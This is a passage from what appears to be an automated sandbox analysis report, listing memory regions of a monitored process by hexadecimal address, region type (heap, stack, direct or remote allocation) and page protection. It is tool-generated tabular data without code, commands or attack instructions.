page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
4921000
|
direct allocation
|
page read and write
|
||
1F1BF000
|
stack
|
page read and write
|
||
781000
|
heap
|
page read and write
|
||
4840000
|
heap
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
37CD000
|
heap
|
page read and write
|
||
377F000
|
heap
|
page read and write
|
||
DFE000
|
unkown
|
page execute and read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
34BE000
|
stack
|
page read and write
|
||
EB6000
|
heap
|
page read and write
|
||
36ED000
|
trusted library allocation
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
C21000
|
unkown
|
page execute and write copy
|
||
13628000
|
trusted library allocation
|
page read and write
|
||
26FB000
|
stack
|
page read and write
|
||
7FFD9B9CD000
|
trusted library allocation
|
page execute and read and write
|
||
375F000
|
heap
|
page read and write
|
||
15953060000
|
heap
|
page read and write
|
||
3503000
|
trusted library allocation
|
page read and write
|
||
374C000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
37B9000
|
heap
|
page read and write
|
||
382E000
|
stack
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
4A10000
|
direct allocation
|
page execute and read and write
|
||
3797000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
54A0000
|
direct allocation
|
page execute and read and write
|
||
960000
|
unkown
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
37C7000
|
heap
|
page read and write
|
||
35AA000
|
trusted library allocation
|
page read and write
|
||
13411000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
8E3000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
18D0000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
350C000
|
trusted library allocation
|
page read and write
|
||
9D5000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B97D000
|
trusted library allocation
|
page execute and read and write
|
||
830000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3137000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
4DB0000
|
heap
|
page read and write
|
||
3C4C000
|
stack
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
37CD000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
12C000
|
stack
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
2D8F1618000
|
heap
|
page read and write
|
||
7FFD9B9C4000
|
trusted library allocation
|
page read and write
|
||
3751000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
378D000
|
heap
|
page read and write
|
||
556D000
|
stack
|
page read and write
|
||
28FD000
|
stack
|
page read and write
|
||
4CD0000
|
direct allocation
|
page read and write
|
||
378A000
|
heap
|
page read and write
|
||
4CA0000
|
direct allocation
|
page execute and read and write
|
||
7CB000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
1CB9D000
|
stack
|
page read and write
|
||
22798EF8000
|
heap
|
page read and write
|
||
8CB000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
2EAF000
|
stack
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
2B3F000
|
stack
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3D3F000
|
stack
|
page read and write
|
||
3757000
|
heap
|
page read and write
|
||
C6B000
|
unkown
|
page execute and write copy
|
||
93D000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
C00000
|
direct allocation
|
page execute and read and write
|
||
119F000
|
stack
|
page read and write
|
||
375F000
|
heap
|
page read and write
|
||
3CEF000
|
stack
|
page read and write
|
||
129C000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
4C40000
|
direct allocation
|
page execute and read and write
|
||
4841000
|
heap
|
page read and write
|
||
4A10000
|
direct allocation
|
page execute and read and write
|
||
12D2000
|
heap
|
page read and write
|
||
4850000
|
heap
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
4EE0000
|
direct allocation
|
page execute and read and write
|
||
DE59AFF000
|
stack
|
page read and write
|
||
3BBE000
|
stack
|
page read and write
|
||
37C7000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
4AFF000
|
stack
|
page read and write
|
||
31AF000
|
stack
|
page read and write
|
||
EAF000
|
heap
|
page read and write
|
||
3D7E000
|
stack
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
3221000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
D90000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
DCE000
|
heap
|
page read and write
|
||
F1B000
|
unkown
|
page execute and read and write
|
||
7BE000
|
heap
|
page read and write
|
||
8CC000
|
heap
|
page read and write
|
||
427E000
|
stack
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
1C13D000
|
stack
|
page read and write
|
||
3781000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
C5B000
|
unkown
|
page execute and read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page execute and read and write
|
||
3773000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
132A9000
|
trusted library allocation
|
page read and write
|
||
374E000
|
heap
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
4CC0000
|
direct allocation
|
page execute and read and write
|
||
F3A7EFE000
|
stack
|
page read and write
|
||
3762000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
33DF000
|
stack
|
page read and write
|
||
77A000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
32A1000
|
trusted library allocation
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
132A1000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
3782000
|
heap
|
page read and write
|
||
2AA0000
|
trusted library allocation
|
page read and write
|
||
359F000
|
trusted library allocation
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
378B000
|
heap
|
page read and write
|
||
BF6000
|
stack
|
page read and write
|
||
37DC000
|
heap
|
page read and write
|
||
720000
|
remote allocation
|
page read and write
|
||
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
802000
|
heap
|
page read and write
|
||
7FFD9BB47000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
3ABF000
|
stack
|
page read and write
|
||
9EC000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
8C9000
|
heap
|
page read and write
|
||
D1E000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
36FF000
|
stack
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
2AFF000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
8C9000
|
heap
|
page read and write
|
||
88F000
|
heap
|
page read and write
|
||
1BF40000
|
heap
|
page execute and read and write
|
||
1DFDEF8C000
|
heap
|
page read and write
|
||
26CC2715000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
37B9000
|
heap
|
page read and write
|
||
514F000
|
stack
|
page read and write
|
||
2D8F14E0000
|
heap
|
page read and write
|
||
CA0000
|
trusted library allocation
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
C80000
|
heap
|
page execute and read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page execute and read and write
|
||
3737000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
3796000
|
heap
|
page read and write
|
||
3374000
|
trusted library allocation
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
1FA3FC80000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
14B0000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
376E000
|
heap
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
EA471DC000
|
stack
|
page read and write
|
||
1BFEA000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
BC1000
|
heap
|
page read and write
|
||
1D95F000
|
stack
|
page read and write
|
||
3788000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
A24000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
762000
|
heap
|
page read and write
|
||
276F000
|
stack
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
1810000
|
heap
|
page execute and read and write
|
||
4611000
|
heap
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
4C00000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
1FA3FBA0000
|
heap
|
page read and write
|
||
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
5560000
|
direct allocation
|
page execute and read and write
|
||
914000
|
heap
|
page read and write
|
||
42FF000
|
stack
|
page read and write
|
||
212B53D2000
|
heap
|
page read and write
|
||
37BF000
|
stack
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
4CB0000
|
direct allocation
|
page execute and read and write
|
||
379F000
|
heap
|
page read and write
|
||
37B6000
|
heap
|
page read and write
|
||
37EF000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
377F000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
3EBE000
|
stack
|
page read and write
|
||
C82000
|
unkown
|
page execute and read and write
|
||
6BA000
|
heap
|
page read and write
|
||
3752000
|
heap
|
page read and write
|
||
C2B000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
1DFDEF61000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
167E000
|
stack
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
F2A000
|
unkown
|
page execute and read and write
|
||
374E000
|
heap
|
page read and write
|
||
6A0000
|
direct allocation
|
page read and write
|
||
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
87A000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
C76000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
C8B000
|
unkown
|
page execute and read and write
|
||
B51000
|
unkown
|
page execute and read and write
|
||
830000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
347F000
|
stack
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
377A000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
2491142B000
|
heap
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
914000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
159F000
|
stack
|
page read and write
|
||
54C0000
|
direct allocation
|
page execute and read and write
|
||
B55000
|
heap
|
page read and write
|
||
472E000
|
stack
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
D10000
|
trusted library allocation
|
page read and write
|
||
648F000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
4441000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
346E000
|
stack
|
page read and write
|
||
35AE000
|
stack
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
376E000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
138B1000
|
trusted library allocation
|
page read and write
|
||
212B53A0000
|
remote allocation
|
page read and write
|
||
10BF000
|
unkown
|
page execute and write copy
|
||
37CD000
|
heap
|
page read and write
|
||
22799010000
|
heap
|
page read and write
|
||
3A7D000
|
stack
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
6A0E000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
1CC7E000
|
stack
|
page read and write
|
||
1D0000
|
heap
|
page read and write
|
||
10BF000
|
unkown
|
page execute and write copy
|
||
E57000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4CD0000
|
direct allocation
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
4EC1000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
1B71D000
|
stack
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
3754000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
27B7000
|
heap
|
page read and write
|
||
12C2000
|
heap
|
page read and write
|
||
303F000
|
stack
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
127F000
|
stack
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
375C000
|
heap
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
32E5000
|
trusted library allocation
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
1DFDEF5C000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
311E000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
342F000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
28BF000
|
stack
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
33BE000
|
stack
|
page read and write
|
||
212B53EC000
|
heap
|
page read and write
|
||
A80000
|
trusted library allocation
|
page read and write
|
||
5F4AEFE000
|
stack
|
page read and write
|
||
C1C000
|
stack
|
page read and write
|
||
1E039000
|
heap
|
page read and write
|
||
EDE000
|
stack
|
page read and write
|
||
537000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
10BE000
|
unkown
|
page execute and read and write
|
||
18A0000
|
heap
|
page read and write
|
||
38AE000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
4EC1000
|
heap
|
page read and write
|
||
1E5AB000
|
stack
|
page read and write
|
||
337E000
|
stack
|
page read and write
|
||
1C3AE000
|
stack
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
EE8000
|
unkown
|
page execute and read and write
|
||
1CBAE000
|
stack
|
page read and write
|
||
22798E10000
|
heap
|
page read and write
|
||
34011C000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
343E000
|
stack
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
E45000
|
heap
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
54C0000
|
direct allocation
|
page execute and read and write
|
||
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
4FD000
|
stack
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
DD4000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
BBC000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
392E000
|
trusted library allocation
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
F3A84FE000
|
stack
|
page read and write
|
||
6A0000
|
direct allocation
|
page read and write
|
||
37C9000
|
heap
|
page read and write
|
||
D18000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
44FE000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
3757000
|
heap
|
page read and write
|
||
357E000
|
stack
|
page read and write
|
||
373E000
|
stack
|
page read and write
|
||
C20000
|
unkown
|
page read and write
|
||
840000
|
trusted library allocation
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
12D0000
|
heap
|
page read and write
|
||
37AD000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
52CE000
|
stack
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3745000
|
heap
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
C20000
|
unkown
|
page read and write
|
||
378F000
|
heap
|
page read and write
|
||
AB1000
|
heap
|
page read and write
|
||
840000
|
trusted library allocation
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
37F0000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
874000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
212B53C6000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
10000
|
unkown
|
page readonly
|
||
8C0000
|
heap
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
3778000
|
heap
|
page read and write
|
||
3AFE000
|
stack
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
37F2000
|
heap
|
page read and write
|
||
15952C80000
|
heap
|
page read and write
|
||
30FE000
|
stack
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
3740000
|
heap
|
page read and write
|
||
2D8F15E9000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
C82000
|
heap
|
page read and write
|
||
37B2000
|
heap
|
page read and write
|
||
49FF000
|
stack
|
page read and write
|
||
5AE0000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
1DFDEF7B000
|
heap
|
page read and write
|
||
6470000
|
heap
|
page read and write
|
||
390D000
|
trusted library allocation
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
3765000
|
heap
|
page read and write
|
||
1CFEE000
|
stack
|
page read and write
|
||
15952CD0000
|
heap
|
page read and write
|
||
4630000
|
heap
|
page read and write
|
||
37E0000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
1DFDEFBD000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
3ABF000
|
stack
|
page read and write
|
||
7FFD9B9FC000
|
trusted library allocation
|
page execute and read and write
|
||
8CE000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3745000
|
heap
|
page read and write
|
||
15952EA0000
|
heap
|
page read and write
|
||
436E000
|
stack
|
page read and write
|
||
D2D000
|
heap
|
page read and write
|
||
5F4AFFF000
|
stack
|
page read and write
|
||
3756000
|
heap
|
page read and write
|
||
7BD000
|
heap
|
page read and write
|
||
212B53A0000
|
remote allocation
|
page read and write
|
||
44AE000
|
stack
|
page read and write
|
||
307E000
|
stack
|
page read and write
|
||
846000
|
heap
|
page read and write
|
||
F14000
|
unkown
|
page execute and read and write
|
||
3797000
|
heap
|
page read and write
|
||
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
5540000
|
direct allocation
|
page execute and read and write
|
||
2D8F18DE000
|
heap
|
page read and write
|
||
37C9000
|
heap
|
page read and write
|
||
63DF000
|
stack
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
B19000
|
heap
|
page read and write
|
||
375B000
|
heap
|
page read and write
|
||
37C5000
|
heap
|
page read and write
|
||
56AD000
|
stack
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
1FA3FCD0000
|
heap
|
page read and write
|
||
145E000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
F1B000
|
unkown
|
page execute and read and write
|
||
376F000
|
trusted library allocation
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
1F5BE000
|
stack
|
page read and write
|
||
7FFD9BA0C000
|
trusted library allocation
|
page execute and read and write
|
||
397F000
|
stack
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
8CC000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
487F000
|
stack
|
page read and write
|
||
F3A86FE000
|
stack
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
4A50000
|
direct allocation
|
page execute and read and write
|
||
142E000
|
stack
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
12C5000
|
heap
|
page read and write
|
||
7AE000
|
heap
|
page read and write
|
||
1020000
|
heap
|
page read and write
|
||
4BEF000
|
stack
|
page read and write
|
||
63E0000
|
heap
|
page read and write
|
||
54E0000
|
direct allocation
|
page execute and read and write
|
||
802000
|
heap
|
page read and write
|
||
E11000
|
unkown
|
page execute and read and write
|
||
AC2C0FF000
|
unkown
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
374C000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
DE598FB000
|
stack
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
C89000
|
unkown
|
page read and write
|
||
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
1E5B0000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
37EE000
|
heap
|
page read and write
|
||
5510000
|
direct allocation
|
page execute and read and write
|
||
2E6F000
|
stack
|
page read and write
|
||
377C000
|
trusted library allocation
|
page read and write
|
||
373D000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
54C0000
|
direct allocation
|
page execute and read and write
|
||
93D000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
37C9000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page execute and read and write
|
||
1DFDEF63000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
615F000
|
stack
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
1060000
|
heap
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
2FF6000
|
trusted library allocation
|
page read and write
|
||
321F000
|
stack
|
page read and write
|
||
35F9000
|
trusted library allocation
|
page read and write
|
||
9C9000
|
unkown
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
36B000
|
stack
|
page read and write
|
||
4EC1000
|
heap
|
page read and write
|
||
4AEE000
|
stack
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
31EE000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
212B5416000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
F4D000
|
stack
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
4EC1000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
A90000
|
remote allocation
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
37B1000
|
heap
|
page read and write
|
||
7FF4DF6F0000
|
trusted library allocation
|
page execute and read and write
|
||
C12000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
27B0000
|
heap
|
page read and write
|
||
1DCAE000
|
stack
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
3758000
|
heap
|
page read and write
|
||
1C6AE000
|
stack
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
99C000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
387E000
|
stack
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
1220000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
13227000
|
trusted library allocation
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
4D8000
|
heap
|
page read and write
|
||
3F6F000
|
stack
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
46EF000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
541E000
|
stack
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
37FE000
|
stack
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3762000
|
